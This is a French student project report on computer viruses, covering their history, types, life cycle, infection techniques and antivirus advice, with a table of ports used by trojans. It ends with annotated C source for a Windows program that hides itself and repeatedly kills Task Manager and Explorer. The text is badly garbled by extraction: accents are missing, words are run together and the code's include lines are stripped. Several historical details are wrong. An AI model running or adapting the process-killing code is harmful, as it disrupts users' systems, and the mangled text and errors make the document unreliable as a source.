Virus Informatiques

of 31/31
Encadré par : M. Abderrahim SABOUR Virus Informatiques Projet de Fin de Module 25/04/2010 Module : Système d’Exploitation Réalisé par : Abdelouahed ERROUAGUI Ahmed JNAH Hamid IMIHI Yassine ELQANDIL
  • date post

    30-Jun-2015
  • Category

    Documents

  • view

    439
  • download

    18

Embed Size (px)

Transcript of Virus Informatiques

Virus InformatiquesProjet de Fin de Module25/04/2010

Module : Systme dExploitation

Encadr par : M. Abderrahim SABOUR

Ralis par: Abdelouahed ERROUAGUI Ahmed JNAH Hamid IMIHI Yassine ELQANDIL

SommaireSommaire............................................................................................................... 2 Introduction :.......................................................................................................3 Dfinitions :.........................................................................................................4 Historique :.......................................................................................................... 4 Type des virus :...................................................................................................6 Cycle De Vie Des Virus Informatique :...............................................................12 Modes dinfection :(fonctionnement).................................................................14 Les Mesures pour protger mon ordinateur contre les virus............................17 Exemple de virus...............................................................................................20 Conclusion :.......................................................................................................24

2Virus Informatiques

Introduction :Dans le cadre des mini-projets du module systme dexploitation encadr par M. Abderrahim SABOUR, nous avons eu loccasion dtudier le sujet : Virus Informatiques. Nous avons dcid de prendre ce sujet comme mini-projet pour arriver comprendre comment les virus fonctionnent rellement, et pour dcortiquer un virus programm en C. Dans ce rapport nous avons spar notre tude en deux parties : 1. Partie Thorique : 1.1. 1.2. 1.3. 1.4. 1.5. Dfinition Historique Types des virus Informatique Cycle de vie Mode de fonctionnement

3Virus Informatiques

2. Partie Pratique :2.1. Etude de cas dun virus en C

Dfinitions :Un Virus est un programme susceptible d'entraner des perturbations dans le fonctionnement d'un ordinateur en dnaturant ses programmes excutables ou ses fichiers systme. Il se transmet gnralement par l'intermdiaire de disquettes ou encore par tlchargement. La plupart des virus informatiques ajoutent quelques lignes de commandes dans le fichier cible lorsqu'ils sont chargs en mmoire. Ces commandes ont gnralement. Actuellement, il existe de nombreux types de virus informatiques, toujours plus sournois et moins visibles. Un virus capable de se propager travers des rseaux informatiques est parfois appel ver, en particulier lorsqu'il se compose de plusieurs segments disperss 4Virus Informatiques Un virus peut rester dans la mmoire de l'ordinateur, travers le rseau.

constituant dans ce cas un programme terminate-and-stay-resident (TSR) : on dit alors qu'il s'agit d'un virus rsident mmoire. Il peut en outre tre encrypt, rendant ainsi sa dtection et sa rsorption plus dlicates. Enfin, il peut tre polymorphe, vitant d'tre dcel grce un changement interne de sa structure.

Historique : 1949 : John Von Neumann prsente les fondements thoriques des logiciels autocopis. 1960 : Un groupe de jeunes ingnieurs des laboratoires Bell met au point un jeu informatique du nom de Core war : on installe dans la mmoire vive d'un ordinateur deux programmes chargs de se retrouver. Le gagnant doit dtruire l'autre en s'autocopiant dans ses fichiers.

1984 : Le magazine Scientific American prsente un guide pour fabriquer ses propres virus. 1986 : Les frres Alvi, deux Pakistanais, fournissent des touristes des copies de logiciels pirates infects du virus Brain. Ce serait le premier virus clairement identifi et connu. Il a caus de srieux dgts sur les campus amricains.

1988 : Peace/Mac affiche son message de paix universelle sur les crans de possesseurs de Macintosh II.

1988 : Robent Morris est arrt pour fraude informatique. Cet tudiant vient de causer 15 millions de dollars de dommage sur Internet cause de son virus. 1989 : Datacrime : trois virus font trembler les Pays-Bas et la France. La police nerlandaise propose alors un ensemble de programmes informatiques bas prix pour lutter contre ces virus. C'est cette poque que la France prend rellement conscience de l'existence5Virus Informatiques des virus.

1991 : Diffus par une disquette vendue dans la revue Soft et Micro, le virus Frodo/4096 arrive en France. Le Clusif (Club de la scurit des systmes d'information franais) propose sur son serveur une procdure de dtection et de dcontamination pour lutter contre Frodo. Le serveur enregistre 8 000 connexions. 1992 : Le virus Michelangelo plonge la plante dans l'effroi. Ses effets restent pourtant limits : 200 000 machines, au lieu des 5 15 millions annoncs. 1995 : Les premiers virus macros destructeurs apparurent en t. 1998 : D'aprs les chiffres publis par Dr Salomon's, diteur d'antivirus, on recensait 17 745 virus diffrents en 1998, contre 18 en 1989. 1999 : Le virus Mlissa se propage par internet. Cach dans un document Word, Mlissa s'auto envoyait aux 50 premiers contacts

contenus dans le carnet d'adresses d'Outlook. Rsultat : plus de 300 000 ordinateurs infects. Internet devenait le premier vecteur de contamination. 2000 : Le virus I Love You sme de nouveau la panique sur Internet. 2003 : Le virus MyDoom a beaucoup fait parler de lui, et la tte de l'auteur de ce dernier reste mise prix.

Type des virus : Vers : Quest-ce que cest ? Un ver informatique (en anglais Worm) est un programme qui peut s'auto-reproduire et se dplacer travers un rseau en utilisant les mcanismes rseau, sans avoir rellement besoin d'un support physique ou logique (disque dur, programme hte, fichier, etc.) pour se propager; un ver est donc un virus rseau.

6Virus Informatiques

Le fonctionnement d'un ver dans les annes 80 : La plus clbre anecdote propos des vers date de 1988. Un tudiant (Robert T. Morris, de Cornell University) avait fabriqu un programme capable de se propager sur un rseau, il le lana et, 8 heures aprs l'avoir lch, celui-ci avait dj infect plusieurs milliers d'ordinateurs. C'est ainsi que de nombreux ordinateurs sont tombs en pannes en quelques heures car le ver (car c'est bien d'un ver dont il s'agissait) se reproduisait trop vite pour qu'il puisse tre effac sur le rseau. De plus, tous ces vers ont cr une saturation au niveau de la bande passante, ce qui a oblig la NSA arrter les connexions pendant une journe. Voici la manire dont le ver de Morris se propageait sur le rseau :

Le ver s'introduisait sur une machine de type UNIX il dressait une liste des machines connectes celle-ci il forait les mots de passe partir d'une liste de mots il se faisait passer pour un utilisateur auprs des autres machines il crait un petit programme sur la machine pour pouvoir se reproduire il se dissimulait sur la machine infecte et ainsi de suite

Les vers actuels : Les vers actuels se propagent principalement grce la messagerie (et notamment par le client de messagerie Outlook) grce des fichiers attachs contenant des instructions permettant de rcuprer l'ensemble des adresses de courrier contenues dans le carnet d'adresse et en envoyant des copies d'eux-mmes tous ces destinataires. Ces vers sont la plupart du temps des scripts (gnralement VB Script) ou des fichiers excutables envoys en pice jointe et se dclenchant lorsque l'utilisateur destinataire clique sur le fichier attach.

Chevaux de Troie : Quest-ce que cest ? Un cheval de Troie (informatique) est donc un programme cach dans un autre qui excute des commandes sournoises, et qui gnralement donne un accs l'ordinateur sur lequel il est excut en ouvrant une porte drobe

7Virus Informatiques

Les chevaux de Troie par porte drobe autorisent

sont des programmes qui

dautres personnes que vous prendre le contrle de votre

ordinateur au travers dInternet.ils sont parfois utiliss comme moyen dinstaller un virus chez un utilisateur. Les symptmes d'une infection :

Le principe des chevaux de Troie tant gnralement (et de plus en plus) d'ouvrir un port de votre machine pour permettre un pirate d'en prendre le contrle (par exemple voler des donnes personnelles stockes sur le disque), le but du pirate est dans un premier temps d'infecter votre machine en vous faisant ouvrir un fichier infect contenant le troyen (trojan) et dans un second temps d'accder votre machine par le port qu'il a ouvert.

Toutefois pour pouvoir s'infiltrer sur votre machine, le pirate doit gnralement en connatre l'adresse IP. Ainsi : soit vous avez une adresse IP fixe (cas d'une entreprise ou bien parfois de particuliers connect par cble, etc.) auquel cas l'adresse IP peut tre facilement rcupre soit votre adresse IP est dynamique (affecte chaque connexion), c'est le cas pour les connexions par modem ; auquel cas le pirate doit scanner des adresses IP au hasard afin de dceler les adresses IP correspondant des machines infectes. Liste des ports utiliss habituellement par les troyens : por t 21 23 25 Back construction, Blade runner, Doly, Fore, FTP trojan, Invisible FTP, Larva, WebEx, WinCrash8Virus Informatiques

Troyen

TTS (Tiny Telnet Server) Ajan, Antigen, Email Password Sender, Happy99, Kuang 2, ProMail trojan, Shtrilitz, Stealth, Tapiras, Terminator, WinPC, WinSpy

31 41 59

Agent 31, Hackers Paradise, Masters Paradise Deep Throat DMSetup

Canular : Quest-ce quun hoax?

On appelle hoax (en franais canular) un courrier lectronique propageant une fausse information et poussant le destinataire diffuser la fausse nouvelle tous ses proches ou collgues. Ainsi, de plus en plus de personnes font suivre des informations reues par courriel sans vrifier la vracit des propos qui y sont contenus. Le but des hoax est simple : provoquer la satisfaction de son concepteur d'avoir bern un grand nombre de personnes Les consquences de ces canulars sont multiples :

L'engorgement des rseaux en provoquant une masse de donnes superflues circulant dans les infrastructures rseaux ; Une dsinformation, c'est--dire faire admettre de nombreuses personnes de faux concepts ou vhiculer de fausses rumeurs (on parle de lgendes urbaines) ; L'encombrement des botes aux lettres lectroniques dj charges ; La perte de temps, tant pour ceux qui lisent l'information, que pour ceux qui la relayent ; La dgradation de l'image d'une personne ou bien d'une entreprise ; L'incrdulit : force de recevoir de fausses alertes les usagers du rseau risquent de ne plus croire aux vraies.

Virus du Secteur de Dmarrage :Quest-ce quun virus secteur de dmarrage ?

Les virus de secteur d'amorage rsident dans le premier secteur d'un support physique (disque dur ou disquette) ou du systme d'exploitation (DOS ou Windows en gnral). Le contenu original du secteur est dplac vers une autre zone du disque et le virus s'octroie cet emplacement. Ce positionnement leurs permets (ces virus sont 9Virus Informatiques amorcs ds le dmarrage) d'tre activ avant tout le reste, leur confrant ainsi, un contrle important de l'ordinateur. Ces virus se chargent gnralement en mmoire vive et y demeurent jusqu' la mise hors tension de l'ordinateur. Ils se distinguent principalement par leur mode de contagion, leurs consquences ne varient pas, destruction de fichiers, de donnes voire reformatage. Heureusement, la plupart des virus de boot ne fonctionnent plus sous les nouveaux systmes d'exploitation tels que Windows NT et tendent disparatre progressivement.

Virus Macro : Quest-ce quun virus de macro ? Les virus Macros sont la plus grande menace ce jour, ils se propagent lorsquun document Microsoft Word, Excel ou PowerPoint contamin est excut. Un virus Macro est une srie de commandes permettant deffectuer un certain nombre de tches automatiquement au sein des applications ci-dessus. Le but non nuisible du

langage de macro dans ces applications est lorigine de pouvoir crer des raccourcis pour effectuer des tches courantes, par exemple en une touche imprimer un document, le sauvegarder et fermer lapplication. Les Virus Macros non supprims se rpandent trs rapidement.

Louverture dun document infect va contaminer le document par dfaut de lapplication, et ensuite tous les documents qui seront ouverts au sein de lapplication. Les documents Word, Excel et PowerPoint tant les documents les plus souvent partags, envoys par Internet, ceci explique la diffusion rapide de ces virus. De plus le langage de programmation des Macros est beaucoup plus facile apprendre et moins compliqu quun langage de programmation classique.

Mails : Quest-ce que cest ?

10Virus Informatiques

Les dun

virus mail.

des Ils

mails ont

sont

capables de

dinfecter les utilisateurs la lecture lapparence nimporte quel autre message, mais contiennent pourtant un script cach qui sexcute ds que vous ouvrez le mail, ou mme le pr visualisez dans le panneau daperu (si tant est que vous utilisiez Outlook avec la version correcte dInternet Explorer). Ce script peut changer les paramtres de votre systme et envoyer le virus dautres utilisateurs par mail. Les virus qui se propagent automatiquement par mail : Ce sont les virus typiques qui sactivent par un simple clic de lutilisateur sur le document joint. Celui-ci excute un script qui utilise les programmes de messagerie pour faire suivre les documents infects dautres utilisateurs de mails. Melissa, par exemple, envoie un message aux cinquante premiers contacts de tous les carnets dadresses auxquels

Microsoft Outlook peut accder. Dautres virus senvoient deux-mmes tous les contacts du carnet dadresse. Quest-ce quun spam ? Un spam est un mail non sollicit, qui fait souvent la promotion de plans denrichissement rapide, demplois domicile, de prts bancaires ou de sites caractre pornographique. Les spams arrivent souvent avec de fausses rfrences sur lexpditeur, do la difficult ragir contre leur auteur. Ces mails doivent simplement tre dtruits. Les pices jointes : Le risque vient des logiciels de messageries qui sont installs sur votre ordinateur, surtout la messagerie Outlook Express, client de messagerie fourni avec Windows XP, cause de son faible niveau de scurit face aux agressions venant d'Internet. Pour l'internaute, l'utilisation de la messagerie reste l'change de courrier au format texte. De faon plus avance, vous pouvez :11Virus Informatiques

- soit transmettre un fichier informatique : document Word, Excel, une image (type photo) ou une archive compresse.

- soit recevoir un document d'un correspondant. Ces pices-jointes correspondent aux documents que l'on reoit. . Donc le danger vient de ces documents transmis, surtout s'il s'agit d'un fichier excutable avec une extension :.com, .bat, .exe mme si la picejointe est envoye par une personne connue, le document peut contenir un parasite : virus, vers... qui peut contaminer votre ordinateur si ce fichier est excut. Si vous ouvrez par inadvertance un document infect, vous installez le parasite sur votre machine, le processus est enclench, le virus va utiliser votre carnet d'adresse pour se propager et contaminer les contacts de votre carnet.

Les spywares : Quest-ce que cest ?

Un spyware est un logiciel espion. C'est un programme ou un sousprogramme conu dans le but de collecter des donnes personnelles sur ses utilisateurs et de les envoyer son concepteur ou un tiers via Internet ou tout autre rseau informatique, sans avoir obtenu au pralable une autorisation de l'utilisateur. Les spywares ont pour objectif primaire, despionner le comportement de linternaute et de transmettre ensuite, son insu, les informations collectes aux crateurs et diteurs de logiciels afin dalimenter une gigantesque base de donnes. Comment cela fonctionne-t-il ? Un spyware sattrape en gnral en naviguant sur Internet, ainsi

qu'en tlchargeant des logiciels gratuits (freeware) ou de publicit (adware). Il est tout particulirement frquent dans les programmes de messagerie instantane (ICQ), les lecteurs audio (RealPlayer) et les systmes peer-to-peer (Kazaa, Limewire). Le spyware lui-mme est un programme autonome ou associ un logiciel12Virus Informatiques

prvu pour tout autre chose. Il utilise alors des techniques comme l'ingnierie sociale ou celles des chevaux de Troie.

Cycle De Vie Des Virus Informatique :Les virus informatiques, tout comme les virus biologiques, possdent un cycle de vie :

Cration:

Cest la priode que va passer un programmeur dvelopper un virus aussi froce que possible. La programmation se fait en code assembleur.

Gestation:

Il s'agit du procd par lequel le virus est copi en un endroit stratgique afin que sa diffusion soit la plus rapide possible. En gnral, la mthode consiste infecter un programme trs populaire puis le distribuer par l'intermdiaire d'un serveur BBS, du courrier lectronique, de l'Internet ou au sein d'une entreprise, d'une cole, etc.

Reproduction (infection):

Les virus, de par leur nature, cherchent se reproduire. Un virus correctement conu se reproduira un nombre de fois important avant de s'activer. C'est l le meilleur moyen de s'assurer de la prennit d'un virus.

Activation:

Les virus possdant une routine de destruction ne s'activent que lorsque certaines conditions sont runies. Certains s'activent certaines dates, d'autres possdent un systme de compte rebours interne. Mme les13Virus Informatiques virus ne possdant pas de telles routines et ne ncessitant pas de

procdure d'activation spcifique peuvent causer des dommages votre systme en s'appropriant petit petit l'ensemble de vos ressources.

Dcouverte:

Cette phase de l'existence d'un virus n'est pas forcment conscutive son activation, mais c'est gnralement ce moment-l qu'elle a lieu. La dcouverte d'un virus est le moment o quelqu'un se rend compte de sa prsence et parvient l'isoler. Une fois cette opration ralise, le nouveau virus est gnralement transmis au NCSA (National Computer Security Association) Washington DC o il est document puis distribu aux dveloppeurs de logiciels antivirus. La dcouverte a lieu la plupart du temps au moins un an avant qu'un virus ne devienne une vritable menace pour la communaut informatique.

Assimilation:

Une fois la dcouverte faite, les dveloppeurs de logiciels modifient leurs programmes pour qu'ils puissent dtecter la prsence du virus. Cette phase dure entre un jour et six mois, selon la comptence du dveloppeur d'anti- virus.

Elimination:

Si un nombre suffisant de dveloppeurs d'antivirus sont capables de faire face au virus et si suffisamment de personnes se procurent l'antivirus adquat, il est possible d'annihiler un virus. Dans les faits, aucun virus n'a rellement disparu, mais un grand nombre d'entre eux ont cess de constituer une menace relle.

Modes dinfection :(fonctionnement)Modes d'infection Les diffrentes techniques dcrites ci-dessous sappliquent principalement aux virus programmes. Certaines dentre elles sappliquent nanmoins aux virus interprts. Il existe en effet des virus par recouvrement et par ajout parmi les macrovirus et les virus de script. 14Virus Informatiques

Recouvrement :

Un virus par recouvrement se contente dcraser partiellement ou en totalit le programme quil infecte. En consquence, il le dtruit au moins partiellement et rend son radication impossible. Dans certains cas, la taille du programme infect nest pas modifie ; dans les cas contraires, celle-ci sajuste la taille du code viral et devient identique pour tout fichier infect. La destruction, mme partielle, du code originel fait que celui-ci ne peut plus fonctionner correctement. Ces virus ne sont gnralement pas rsident en mmoire. Ne ralisant plus la fonction souhaite, lutilisateur les dtecte rapidement. Les virus agissant par recouvrement ne russissent jamais se dissminer largement. Exemple : BadGuy, W32/HLL.ow.Jetto, LINUX/Radix.ow, VBS/Entice.ow.

Le virus crase une partie du code du programme hte

Ajout :

Un virus par ajout modifie un programme sans le dtruire. Ayant altr le point d'entre, le virus sexcute chaque fois que le programme est lanc, puis lui 15Virus Informatiques rend la main . Celui-ci fonctionne alors de faon normale. La force dun virus par ajout est que le programme infect semble fonctionner correctement ce qui peut retarder la dtection du virus. La faiblesse dun virus par ajout est que la taille du programme est augmente de la taille du virus, ce qui rend un reprage fond sur la variation de la taille des programmes possible. Exemples: Cascade, Jrusalem, W95/Anxiety, W32/Chiton, VBS/Daydream.

Le virus greffe son code sur le programme hte

Cavit :

Connaissant la structure spcifique du type des programmes contaminer, le virus modifie le point d'entre du programme et insre tout ou partie de son code dans diffrentes zones non utilises. Le fichier COMMAND.COM fut longtemps la cible privilgie de ce genre de virus ; dans ce cas, le code viral pouvait se situer entre le bloc de code, le bloc des donnes, le bloc de pile stack . Cette technique est maintenant rgulirement rencontre dans les environnements Windows. Exemple : W95/Caw. Le virus morcelle son code en modules insrs dans les espaces inoccups du programme hte

16Virus Informatiques

Point d'entre obscure :

Avant infection, l'analyse du programme cible permet un positionnement du point d'entre du code viral en un lieu variable au sein du fichier. Le point dentre du programme et les instructions qui sy situent sont inchangs. Lorsque cette technique est associe une infection par cavit et un codage polymorphique, la dtection devient trs problmatique. Cette technique est maintenant rgulirement rencontre dans les environnements Windows. Elle est

Le virus place son point d'entre dans un endroit variable du

trs pnalisante pour les antivirus qui doivent parfois largir fortement leur zone de recherche. Exemple : W95/Orez.

Les Mesures

pour protger mon ordinateur

contre les virusInternet est un outil de travail merveilleux, mais aussi un endroit o les virus voyagent en grand nombre et en tout temps. Heureusement, il existe des moyens pour vous protger contre ces virus, dont la protection avec les logiciels antivirus. Si vous tes aux prises de virus, soit vous n'avez pas install un logiciel antivirus ou encore, votre logiciel n'a pas russi tout arrter. La premire chose faire est de lancer un scan de tous vos disques installs dans votre ordinateur l'aide de votre logiciel antivirus. Ensuite, lancez galement un scan de vos dossiers et fichiers l'aide d'un logiciel anti-espion. De cette manire, vous liminerez les virus, ainsi que les logiciels espions qui se sont infiltrs dans votre ordinateur votre insu. Il existe plusieurs bons logiciels anti-virus gratuits sur le march. Pour liminer 17Virus Informatiques dfinitivement les virus informatiques de votre PC, je vous recommande le logiciel Kaspersky 2010, la version familiale. Une fois install, le logiciel vous demandera l'autorisation pour lancer un scan complet de tout votre ordinateur.

Antivirus/Pare-feu Qu'est-ce qu'un antivirus ?

Un antivirus est un programme capable de dtecter la prsence de virus sur un ordinateur et, dans la mesure du possible, de dsinfecter ce dernier. On parle ainsi d'radication de virus pour dsigner la procdure de nettoyage de l'ordinateur. Chaque ordinateur, pour assurer sa scurit sur internet, doit disposer d'un seul antivirus et d'un seul pare-feu (firewall) (plusieurs antivirus ou plusieurs pare-feu crent des conflits...).

Qu'est-ce qu'un pare-feu (firewall) ?Un pare-feu (appel aussi coupe-feu, garde-barrire ou firewall en anglais), est un systme permettant de protger un ordinateur ou un rseau d'ordinateurs des

intrusions provenant d'un rseau tiers (notamment Internet). Le pare-feu est un systme permettant de filtrer les paquets de donnes changs avec le rseau.

Solutions

Voici quelques moyens de protger votre ordinateur contre les virus:

Solution 1: Les logiciels antivirus Votre premire ligne de dfense consiste installer un logiciel antivirus. Pour tre plus sr, installez galement un logiciel pare-feu, qui est maintenant intgr dans certains antivirus. Ce logiciel peut balayer tous vos disques de virus et les neutraliser. Voici quelques lments considrer lors de l'valuation d'un logiciel antivirus. - La compatibilit avec votre systme d'exploitation. Assurez-vous que le logiciel fonctionne avec votre systme, en particulier si vous utilisez un vieux systme d'exploitation comme Windows 98. - Protection automatique de fond. Cela signifie que votre logiciel antivirus est constamment en action pour dtecter les infections et les neutraliser comme 18Virus Informatiques elles apparaissent. Cela donne une tranquillit d'esprit. - La frquence des mises jour. Comme de nouveaux virus apparaissent chaque jour, vous aurez besoin de mises jour rgulires. C'est encore mieux si elles se produisent automatiquement lorsque vous vous connectez Internet. Si la mise jour automatique n'est pas incluse, vous aurez vrifier vous-mme sur Internet les mises jour qui doivent tre installes dans votre logiciel de scurit. - La certification ICSA. La scurit informatique dispose de normes pour les taux de dtection des logiciels antivirus. Assurez-vous que votre logiciel a la certification ICSA. - Le support technique. C'est une bonne ide de choisir un forfait qui offre une assistance technique gratuite, en ligne ou par le biais d'un numro sans frais. Solution 2: Mfiez-vous des extensions de nom de fichier L'extension d'un nom de fichier est les trois lments qui viennent aprs le point. Windows, par dfaut, a cach les extensions de nom de fichier, mais ce n'est pas une trs bonne ide. Pour voir les extensions dun nom de fichier, cliquez sur le bouton Dmarrer, ensuite sur Panneau de configuration. Choisissez alors Options

des dossiers et type de fichier. Dsactivez la case cocher Masquer les extensions des fichiers dont le type est connu. Cliquez sur Appliquer. Solution 3: Mfiez-vous des inconnus .exe

Un virus est un logiciel qui doit tre excut afin de faire son sale boulot. Les virus ont gnralement comme extension, exe. Malheureusement, c'est le mme dans Program Files. Alors, ne paniquez pas si vous trouvez des fichiers nomms Word.exe ou Excel.exe sur votre systme; il sagit seulement de vos logiciels Microsoft. Il suffit de ne jamais ouvrir un fichier avec une extension .exe si vous ne savez pas la raison d'tre de ce fichier.

Solution

4:

Protger

les

macros

de

MS

Word,

Excel

et

Powerpoint

Les macros virus sont un autre type de virus. Les macros sont des ensembles de commandes que les utilisateurs peuvent enregistrer en tant que raccourcis pour excuter des fonctions parfois longues en quelques frappes de touche seulement. Un virus de macro 19Virus Informatiques peut verrouiller le clavier et mme faire la suppression de fichiers. Word, Excel, PowerPoint viennent tous avec une fonction pour vous protger contre les virus macros. Pour vous assurer que le vtre est activ, cliquez sur le menu Outils, Macro et Scurit. Sur l'onglet Niveau de scurit, assurez-vous Solution que 5: moyen Utiliser ou des lev mots est de slectionn. passe

Si vous partagez votre ordinateur, c'est une bonne ide d'attribuer chacun un mot de passe. Les mots de passe doivent tre une combinaison d'au moins huit caractres, des lettres et des chiffres, et de prfrence nayant aucun sens. Solution 6: Mise jour du logiciel d'application

des Microsoft effectue constamment correctifs pour les failles de scurit dans son systme d'exploitation et les logiciels d'application. Il est donc important deffectuer les mises jour de Windows frquemment. Pour obtenir les correctifs de scurit les plus rcents.

Exemple de virus Virus en C :

/**********************************/ //DoubleStopProcess.c //Compiler Dev-C++ 4.9.9.2 /**********************************/ #include #include #include //contient les variable de type PROCESSENTRY32 #include #include #define Progy "taskmgr.exe" #define Master "explorer.exe"

20Virus Informatiquesint func_termi(void); int ID,XY,T3;

int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance, LPSTR lpCmdLine, int CmdShow) { char message[] = "This programme affects yout taskmanager :) stop me if u cann TAB+SHIFT+RETURN"; char title[] = "INFORMATION";

HWND nShow; nShow ta9riban**/ ShowWindow(nShow,SW_HIDE);/**set the specified window's show state. SW_HIDE :Hides the window and activates another window.**/ = FindWindow("ConsoleWindowClass","ConsoleWindowClass");/**3kelt

MessageBox(0,message,title,MB_OK| MB_ICONINFORMATION);/**si title est null la valeur par dfaut est ERROR**/

//

_sleep(100);

func_termi();

}

int func_termi(void) { long code; HANDLE Snap,Process;/**Le handle est un identifiant qui permet de dsigner l'objet de manire unique. C'est juste une autre manire de rfrencer l'objet. On ne parlera plus d'adresses pour les rfrences

21Virus Informatiques d'objets manags.**/PROCESSENTRY32 proc32;/**contient des info sur un processus apres avoir pris une snapshot des processus qui reside dans le systeme**/ // BOOL ServiceName;

while(1) { _sleep(100); Snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);/**Tlhelp32.h**/ /**Takes a snapshot of the specified processes, as well as the heaps, modules, and threads used by these processes.**/ /** Includes all processes

in the system in the snapshot. To enumerate the processes**/

if(Snap==INVALID_HANDLE_VALUE) { MessageBox(0,"Sorry,no way!!!","Error",MB_OK | MB_ICONERROR); exit(0); } proc32.dwSize=sizeof(PROCESSENTRY32);

if((GetAsyncKeyState(VK_TAB)==-32767)&&(GetAsyncKeyState(VK_SHIFT)==-32767 )&&(GetAsyncKeyState(VK_UP)==-32767)) { MessageBox(0,"U knew the key NOOO I'm GOOONE ;","BYE BYE",MB_OK | MB_ICONEXCLAMATION); return EXIT_SUCCESS; } while((Process32Next(Snap,&proc32))==TRUE) { if(strcmp(proc32.szExeFile,Progy)==0){/**test d'egalit entre le proc courant et la 22Virus Informatiques chaine progy **/ ID=proc32.th32ProcessID; Process=OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,ID);/**Required retrieve certain information about a process, such as its token, exit priority class*/ XY=GetExitCodeProcess(Process,&code);/**Retrieves the termination status of the specified process.**/ Process=OpenProcess(PROCESS_TERMINATE,FALSE,ID);/**Opens an existing local process object.**/ T3=TerminateProcess(Process,code);{MessageBoxA(0,"Done!Taskmgr.exe stopped!!!","Info",MB_OK);} } else if(strcmp(proc32.szExeFile,Master)==0){/**la meme chose pr l'autre proc**/ is code, and to

ID=proc32.th32ProcessID; Process=OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,ID); XY=GetExitCodeProcess(Process,&code); Process=OpenProcess(PROCESS_TERMINATE,FALSE,ID); T3=TerminateProcess(Process,code);{MessageBoxA(0,"Done! stopped!!!","Info",MB_OK);} } } } } Calc.exe is

23Virus Informatiques

Conclusion :Le projet nous a appris comment bien lire un code, lanalyser, le modifier et essayer de se lancer dans ce domaine vague pour atteindre nos objectifs comme futur informaticiens. Finalement, nous pouvons dire que ce mini-projet nous a t dune grande utilit, vu que ctait un dfi qui mrite tre attaquer.

24Virus Informatiques